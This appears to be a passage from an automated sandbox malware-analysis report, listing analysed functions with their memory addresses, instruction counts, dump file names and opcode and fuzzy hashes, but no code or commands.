                              • String ID:
                              • API String ID:
                              • Opcode ID: 8b5b340f7ad890edde7c2275fea56dfdf3d640c033cbab8cfe1ee40751719b26
                              • Instruction ID: cd4622d829bd5e15a6ec54db2cd2d2b5d52fddec0dd6598e7197aabaef440921
                              • Opcode Fuzzy Hash: 8b5b340f7ad890edde7c2275fea56dfdf3d640c033cbab8cfe1ee40751719b26
                              • Instruction Fuzzy Hash: C9516461F1D90B97FB56B76C94966BD36C2DFA4305F600535D10DC33C6EE2CA9064342
                              Function 00007FFF60F547AE Relevance: .2, Instructions: 157COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d77aa893ce3b9ad850d1d61250b6be1e6b08c31af105079e6d001bda54117446
                              • Instruction ID: 1caa3fda91b7241cd6c4ef65dad7bb4c81ca09444e77b436a1136082462d1b7a
                              • Opcode Fuzzy Hash: d77aa893ce3b9ad850d1d61250b6be1e6b08c31af105079e6d001bda54117446
                              • Instruction Fuzzy Hash: C2416D31908A1C8FDB68EF68D8456EDB7F1FB98310F1482AED409E3252DB74A9458F81
                              Function 00007FFF60F520ED Relevance: .2, Instructions: 154COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbbe48d6d73c785ad97e52ffc26ffc18fce71f4d628a872bc4d9085097e781f3
                              • Instruction ID: 34f8c4f6df1726330c527fb1ff6c85a3cd1c390e00b16e1a92d051c2f84b664e
                              • Opcode Fuzzy Hash: fbbe48d6d73c785ad97e52ffc26ffc18fce71f4d628a872bc4d9085097e781f3
                              • Instruction Fuzzy Hash: 8E513C36F1C54786FBA6AA68D0911FD23C2EFB6324F250639D54DC73C2DD2EAC564282
                              Function 00007FFF60F53540 Relevance: .1, Instructions: 149COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 68a4b8e652ac3230dec68a69a9e162be9a7e39703a4fe12ed628ca76ec1a11bc
                              • Instruction ID: a62e8af038fc6afc86175aaa8e4991b7db54bd95a50dab4e0831d0acd20220af
                              • Opcode Fuzzy Hash: 68a4b8e652ac3230dec68a69a9e162be9a7e39703a4fe12ed628ca76ec1a11bc
                              • Instruction Fuzzy Hash: 26419421C2C59659F379465CF4C24F9B3C1EB65720F64517DDCA982BC7BC1C68A601C3
                              Function 00007FFF60F51B9F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6c10670339a9693b6821ce83ff3555448ae01383cc324c7b575182b0c0aa225
                              • Instruction ID: d7ef21947521ca3a2135df4aecf7dbcd5498c13c611a3c043e1db1ad90f44f20
                              • Opcode Fuzzy Hash: d6c10670339a9693b6821ce83ff3555448ae01383cc324c7b575182b0c0aa225
                              • Instruction Fuzzy Hash: 4A41B501F1C91756E64977B821661BE0DE39F9434AFE18834E20DD7BCFEE6DAA024351
                              Function 00007FFF60F531F2 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9503e6791d232f85b2ba2797cb90f78a3b335cd1dc0eb51ddd5cf15cb7fc51f2
                              • Instruction ID: f1a1da62d58b0c7eb9ce08712f0a2369054b437561ce54164870839893110598
                              • Opcode Fuzzy Hash: 9503e6791d232f85b2ba2797cb90f78a3b335cd1dc0eb51ddd5cf15cb7fc51f2
                              • Instruction Fuzzy Hash: AE413D21F1C81B9BEB95EB2C90A51B926D3EBA8312FA50575D10DC33D6EE3CAC428340
                              Function 00007FFF60F533D0 Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1769f3be24636e26bed17d684e0ca3c8b8731ffa24050aa4d92ab2d05ec053e
                              • Instruction ID: 5e4e9b3ef734fdae8976502ae73285a8f50f0c12c7ba0178e9d752e8e93094db
                              • Opcode Fuzzy Hash: d1769f3be24636e26bed17d684e0ca3c8b8731ffa24050aa4d92ab2d05ec053e
                              • Instruction Fuzzy Hash: 3F316D61A0D3C24FE717977898A22A47FB18F53210F2A01F7D089CB5E3D91D581B8363
                              Function 00007FFF60F583CF Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5bc6850e5511669c541f46af74404f13c139d38a0dd275b7aaf0f8a356ea8798
                              • Instruction ID: ac27cb1cb6fed3cf3937281440182e204961b4f954e2d395f73ad9ebfa2965bf
                              • Opcode Fuzzy Hash: 5bc6850e5511669c541f46af74404f13c139d38a0dd275b7aaf0f8a356ea8798
                              • Instruction Fuzzy Hash: AA21C531A0CA1C8FDB58EF988446BEDBBE0FB95320F00422FD00AD3651DB75A556CB81
                              Function 00007FFF60F57D46 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction ID: 9002ab626b61203f6f0f812816529098946667846a7c0611d6b05d7fe192bab3
                              • Opcode Fuzzy Hash: 988ecaddd66262a7587bab44ef6af5af5cd89c71b2a3b42d81b2cbd74bf8627c
                              • Instruction Fuzzy Hash: 36312870518B8C8FEBA5DF28C845BD97BE1FF98710F10866AE84DC7255CB38A945CB81
                              Function 00007FFF60F5215C Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: afbfa82d90ac8c3145fb249408858b3deadf7d5e2e3d4887b90b26e95ac5d2ce
                              • Instruction ID: 2ca6ed38d1341a16780f719ef7a03ade1782f34f78a4de1803b366a092ee4c9c
                              • Opcode Fuzzy Hash: afbfa82d90ac8c3145fb249408858b3deadf7d5e2e3d4887b90b26e95ac5d2ce
                              • Instruction Fuzzy Hash: 4C215335F1C50786FB99EA2884962BD33C2EFA5305F640635D50EC33D2EE2DA8164692
                              Function 00007FFF60F52249 Relevance: .1, Instructions: 79COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19bca6281cd8b4d94b9aec7cf10966a0d06ac70991850a47c798a1c398eb5d43
                              • Instruction ID: e265cd95491215f60b1a376035afbe3ed93dfd739c8b637dea85d21961c3522e
                              • Opcode Fuzzy Hash: 19bca6281cd8b4d94b9aec7cf10966a0d06ac70991850a47c798a1c398eb5d43
                              • Instruction Fuzzy Hash: 02213B26F0C10386FBAAA668C4521BE23C2AFB6315F750639D50DC73C6EC2DA85342C2
                              Function 00007FFF60F537DA Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4dc45803511c79ae477267300fe3b7a363fa0ee91489ff900afa3dfbd7e1dbf8
                              • Instruction ID: 79460b2922b3b31513d152909f646738c946785425fd0a1e8e474695f527ecef
                              • Opcode Fuzzy Hash: 4dc45803511c79ae477267300fe3b7a363fa0ee91489ff900afa3dfbd7e1dbf8
                              • Instruction Fuzzy Hash: 4BF09032E2883A8AFA99663C90442F852C1EB5D321F9908B6E80DE73C1ED1D5C814280
                              Function 00007FFF60F52ABC Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db6b80b1d640f964ef2366ca90d97da2b9a5f65e59a79905068fb5bf7972b4ea
                              • Instruction ID: 047957b8a2a736d72b030ed844ffc4cdc4a26e862800251ef1c14535c0d736c6
                              • Opcode Fuzzy Hash: db6b80b1d640f964ef2366ca90d97da2b9a5f65e59a79905068fb5bf7972b4ea
                              • Instruction Fuzzy Hash: 04F09030F18E0A5FD798DB78801923866E3FB94201F904A39D00EC37C2DF79A8518380
                              Function 00007FFF60F52ADF Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 25e4bebb88cdb20188f35e50cd25d8ac47f0d6a405b7f24aacdf5c3aed10bef6
                              • Instruction ID: 3df728508d0de46e1a94417ffe7daa9d737f6096cfadfaccb7089e08a409d39e
                              • Opcode Fuzzy Hash: 25e4bebb88cdb20188f35e50cd25d8ac47f0d6a405b7f24aacdf5c3aed10bef6
                              • Instruction Fuzzy Hash: CBF06221F18A0B4FD758AB789095169A6E3FF94341B918AB4D10EC76CBDE3CEC418340
                              Function 00007FFF60F580D8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 89191f8fa9244851ff1b6556ec30c45ad996cf71cb06ca804e9af4d475f34579
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 27E0ED10F2D80E87AAAA515D68562B916D1DBB5710FB80036D50EE27C4ED9E6C831296
                              Function 00007FFF60F580E0 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: 8056777e42f3d5b3b5c052d8d27c97fc023b2ae2cb693bb238e66ee3434d2da6
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: 43E01211F3D81B96B6AA216E68551B936C1DBA9B50F740536E40DE23C9FE8CAC834293
                              Function 00007FFF60F5234E Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3660941a0a841f40894bd478cb991d91deab9d7278813a10aaf97ce55626dd5c
                              • Instruction ID: 3606eedafabdf901d48fe9c869aea866091ba1f898875d6f7c1b0945b295758b
                              • Opcode Fuzzy Hash: 3660941a0a841f40894bd478cb991d91deab9d7278813a10aaf97ce55626dd5c
                              • Instruction Fuzzy Hash: 75F05E22F0C54381FFA12554E0401FE23C2AFB2364F690636D44DC73C6DD2EAD924242
                              Function 00007FFF60F53810 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82924cd401cfa2775b362e8485506b9e0efcaef9158ea8a1fb7ce217a7a5ba9f
                              • Instruction ID: 4ecf1becda060c40759e1f52679d4337c75bffa4cb6b45d23a01ff7671733dc9
                              • Opcode Fuzzy Hash: 82924cd401cfa2775b362e8485506b9e0efcaef9158ea8a1fb7ce217a7a5ba9f
                              • Instruction Fuzzy Hash: 9CE06D32E1C93A8AF699363CA1052F852C1EB59361F9908B7E80DD33D2FD1D9D814280
                              Function 00007FFF60F51725 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99187e9665a8e66c4f47d50ae00a307cb993a3d117dec549230d48d965cbd303
                              • Instruction ID: 03105cab8b9f4b3e1ea5e01e52518f6dba4ff7ac3fee690e28dbafaff4153b8a
                              • Opcode Fuzzy Hash: 99187e9665a8e66c4f47d50ae00a307cb993a3d117dec549230d48d965cbd303
                              • Instruction Fuzzy Hash: 86E0C082D1D43A59F6913998A0452FC62C0FB29360F664870DA9D972C1CD0C6C8102C9
                              Function 00007FFF60F5865E Relevance: .0, Instructions: 28COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62a294513b1efed0e6bd429ce4f15174f4954cddc187171e72594785c91e7db0
                              • Instruction ID: 007de1ab732e26c6d12b1dac164158da3cdfbc1b3c93c72ca2f4bfd08428591b
                              • Opcode Fuzzy Hash: 62a294513b1efed0e6bd429ce4f15174f4954cddc187171e72594785c91e7db0
                              • Instruction Fuzzy Hash: A6F03920E3D9079AFB66A22895891B612C1EF28345F744474D90BE36C6ED9CBC428282
                              Function 00007FFF60F5888C Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction ID: f14825a93f725bfe3c7bbb5dd9cc838044aee1a4181de9a0ab636f6e0fc3f609
                              • Opcode Fuzzy Hash: 82768b18965c2e656710d5d3c51e66e2b639a2187cac72ca216db488fdc5a3aa
                              • Instruction Fuzzy Hash: 78C08C12B1DC085BA680F11C689EBBE63D2E7FC5A1728413AD40EC33A5EC34D9878342
                              Function 00007FFF60F5860C Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b12fcf0a822471ffbc597dff52a96b927e42a264b4d85ff4e689588ba082d923
                              • Instruction ID: 11c8be6eb31272ddf964f616eeef82e0b6953db18d907647d011bd19f9dd8280
                              • Opcode Fuzzy Hash: b12fcf0a822471ffbc597dff52a96b927e42a264b4d85ff4e689588ba082d923
                              • Instruction Fuzzy Hash: 47D0123164A31589E759373965111A862C1EF45255F9405B9E90DC43A2FD2EC5C14350

                              Executed Functions

                              Function 00007FFF60F5996B Relevance: .5, Instructions: 521COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 37133f78a833a5a52f3c802504e932ec4ee19d3383bd98ef0feb609305b26b3c
                              • Instruction ID: eb0cddbe5a0ee243b2484e69482c4f442e3484ddba4aec1711887db7df10ac47
                              • Opcode Fuzzy Hash: 37133f78a833a5a52f3c802504e932ec4ee19d3383bd98ef0feb609305b26b3c
                              • Instruction Fuzzy Hash: AEF129A6C1C64B9AFB1EB76488422F93BD0DF61311F6801BDD44AC7697FD1CB50B8292
                              Function 00007FFF60F5B8C0 Relevance: .4, Instructions: 415COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 59e1950cdf12b226d5c972a211f0821a45eb5c025c7ff0d4b59e03ca4c985ced
                              • Instruction ID: 7bf98ef8f09aaf35577224be723733109981e30421d1fa0299ef8593170319bc
                              • Opcode Fuzzy Hash: 59e1950cdf12b226d5c972a211f0821a45eb5c025c7ff0d4b59e03ca4c985ced
                              • Instruction Fuzzy Hash: 62D1A421D1D7968EF767932498561B97BE0DF72311F7909B7C889CB2D3DD0D280A83A2
                              Function 00007FFF60F5C012 Relevance: .3, Instructions: 341COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f978464424a050834f6f4e9204eee812f06306fb5245022360d8ac293c6b5035
                              • Instruction ID: 01e1b5eb1b630d8ee7426c047e649b1de8179d1b21fc25b6917124dfe7d58613
                              • Opcode Fuzzy Hash: f978464424a050834f6f4e9204eee812f06306fb5245022360d8ac293c6b5035
                              • Instruction Fuzzy Hash: 62B1C321D0C68A8EFB6B966488562B97BD0EF75300F7409BAD44ED72D3DD1C684A83D2
                              Function 00007FFF60F5CB20 Relevance: .2, Instructions: 244COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ac70508d7b1a24997c04a32b6d721c6c051471fe6d01c97fa8ce9b8f3d3c126
                              • Instruction ID: 82b8e933b6d9253cb42ce254a40e392eb9a832db573c52cb9f483d7d95d552a3
                              • Opcode Fuzzy Hash: 4ac70508d7b1a24997c04a32b6d721c6c051471fe6d01c97fa8ce9b8f3d3c126
                              • Instruction Fuzzy Hash: 97817261D0D2D68FE767962498192653BE0DF72744F2909F6C48ECB2E3ED0D680E83D2
                              Function 00007FFF60F52918 Relevance: .8, Instructions: 819COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ecbcf36fb90b37e44021336140c2392f39cd7b39d72d39f99a8d0936e75a8de
                              • Instruction ID: 596f35a739fffc764bb2975fec263a48e7f896fd9f65d807a2b16a0472e69793
                              • Opcode Fuzzy Hash: 7ecbcf36fb90b37e44021336140c2392f39cd7b39d72d39f99a8d0936e75a8de
                              • Instruction Fuzzy Hash: C6523C21F2C91B8BFBA6BB6880955B936D2EBE4315FA10435E00DC77C6EE2DEC424745
                              Function 00007FFF60F51890 Relevance: .4, Instructions: 410COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9579f270bcd157bded5d14555289d236eef1270e31adebfd0e881735db0ca3bf
                              • Instruction ID: 7d2751e262a43f959babb7065d78d4566dcb0ddf2c4bccf40576050e55f40118
                              • Opcode Fuzzy Hash: 9579f270bcd157bded5d14555289d236eef1270e31adebfd0e881735db0ca3bf
                              • Instruction Fuzzy Hash: C5C10222E1C56386FB69BA2C94822F937C1DFA5324F6405B9E44DC73D3FE1C69478286
                              Function 00007FFF60F52B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62b8d7d8791420f7e7ed2cc0626fa31ee29de1aac3be8f3a3654ed0d42ee1d47
                              • Instruction ID: e0b9d53daa72e6a75380ea1bc4ba0a2eff2b09c30cbabe6d12db50d0dcf38988
                              • Opcode Fuzzy Hash: 62b8d7d8791420f7e7ed2cc0626fa31ee29de1aac3be8f3a3654ed0d42ee1d47
                              • Instruction Fuzzy Hash: 50C14D21F2C51B8BFB99A72880A55BD26D2EFE9315FA50539D00EC77C6EE2DEC424344
                              Function 00007FFF60F5CFC0 Relevance: .2, Instructions: 240COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fb68d00fa0c99150e0953875e3bbcdc0d1b4e92ca5faaa94370ad40a187a047a
                              • Instruction ID: 8346f438f62a6fc7c6047404f29494266c3a760852c08510ada53a4abd724f03
                              • Opcode Fuzzy Hash: fb68d00fa0c99150e0953875e3bbcdc0d1b4e92ca5faaa94370ad40a187a047a
                              • Instruction Fuzzy Hash: B7719565E0C5078BFB9AB66C98563B937C1DF75325F6401B5E54EC33C2FD1CA80A4292
                              Function 00007FFF60F53550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f9d29d7e6de84839c77b7bd5f9c04ed0cb4545b1c72a37e2b5506d15c533176
                              • Instruction ID: efa9e3a15c58e1d93cd36a8e5f7482729109b09bb6b51ea8f2f0bbff474090bd
                              • Opcode Fuzzy Hash: 7f9d29d7e6de84839c77b7bd5f9c04ed0cb4545b1c72a37e2b5506d15c533176
                              • Instruction Fuzzy Hash: 6751B071C2C4668AF77A166CF4824F9A7C1EF69360FA50078DCAD837C7AC1C6CA641C2
                              Function 00007FFF60F58635 Relevance: .2, Instructions: 206COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c1bb78e959abffe641219ef5589b1e0b02d387abb75f140487e42de425ea8c6
                              • Instruction ID: 545bf98803a3835e193c2cc1833bd17c3939f84432410cd4566acad5b20edba9
                              • Opcode Fuzzy Hash: 6c1bb78e959abffe641219ef5589b1e0b02d387abb75f140487e42de425ea8c6
                              • Instruction Fuzzy Hash: C251E321A2E6978FF712A77898951B53BD0DF6A310F2801B6E449C72D3ED4D68478392
                              Function 00007FFF60F5456A Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000011.00000002.1201732744.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7fff60f50000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3cf7ccc792fbffb60feffe10b11dc4c273793d3ae4954f8115219be507909e29
                              • Instruction ID: 687176beb1f29170fbf537c0c1dcfd06c1354e2790c1ba7910ad032ee0fe3ac6
                              • Opcode Fuzzy Hash: 3cf7ccc792fbffb60feffe10b11dc4c273793d3ae4954f8115219be507909e29
                              • Instruction Fuzzy Hash: E4514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD00DE3252DF34A9858F81
